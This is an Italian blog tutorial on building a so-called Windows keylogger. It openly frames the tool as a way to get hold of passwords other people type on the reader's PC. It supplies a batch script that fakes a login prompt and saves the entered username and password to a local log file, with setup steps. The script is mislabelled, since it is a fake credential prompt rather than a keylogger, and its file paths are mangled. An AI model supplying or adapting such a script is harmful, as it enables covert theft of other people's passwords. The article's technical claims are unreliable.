Guide, Recensioni, Hacking e Mobile alla portata di tutti.

Come creare un Keylogger per Windows in poche mosse

0

Quanti di voi si sono sempre chiesti se sia possibile impossessarsi delle password digitate da alcuni utenti sul proprio PC? La risposta è semplice, basta usare un Keylogger; in informatica un Keylogger è uno strumento hardware o software in grado di effettuare lo sniffing della tastiera di un computer, cioè è in grado di intercettare e catturare segretamente tutto ciò che viene digitato sulla tastiera senza che l’utente si accorga di essere monitorato. [Fonte Wikipedia]. Oggi vi mostreremo come creare un Keylogger utilizzando il Blocco note. 

Il tutto è davvero semplice, basta creare un nuovo documento di testo cliccando con il tasto desto del mouse sul Desktop Nuovo–> Documento di testo (vedi immagine) e copiare il seguente testo:

@echo off
color a
title Keylogger
cls
echo Please Enter Your Email Address And Password
echo.
echo.
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> C:LogsLog.txt
pause
start >>Program Here<<
cd “C:Logs”
exit

Una volta copiato il testo dobbiamo salvare il tutto, ma attenzione, bisogna cambiare l’estensione del file da .txt a .bat (vedi foto), bisogna rinominare il file in: Logs.bat

Ora non ci resta che creare una cartella nella root principale del nostro hard disk, quindi rechiamoci in Risorse del computer–> disco locale C: e qui creiamo una nuova cartella rinominandola in “Logs“, il nome della cartella deve obbligatoriamente essere Logs altrimenti il programma non funzionerà!

Il nostro Keylogger ora è pronto, possiamo avviare il fila Logs.bat, alla chiusura noteremo che il testo digitato sarà stato salvato automaticamente in un file di testo all’interno della cartella Logs.

Leave A Reply

Your email address will not be published.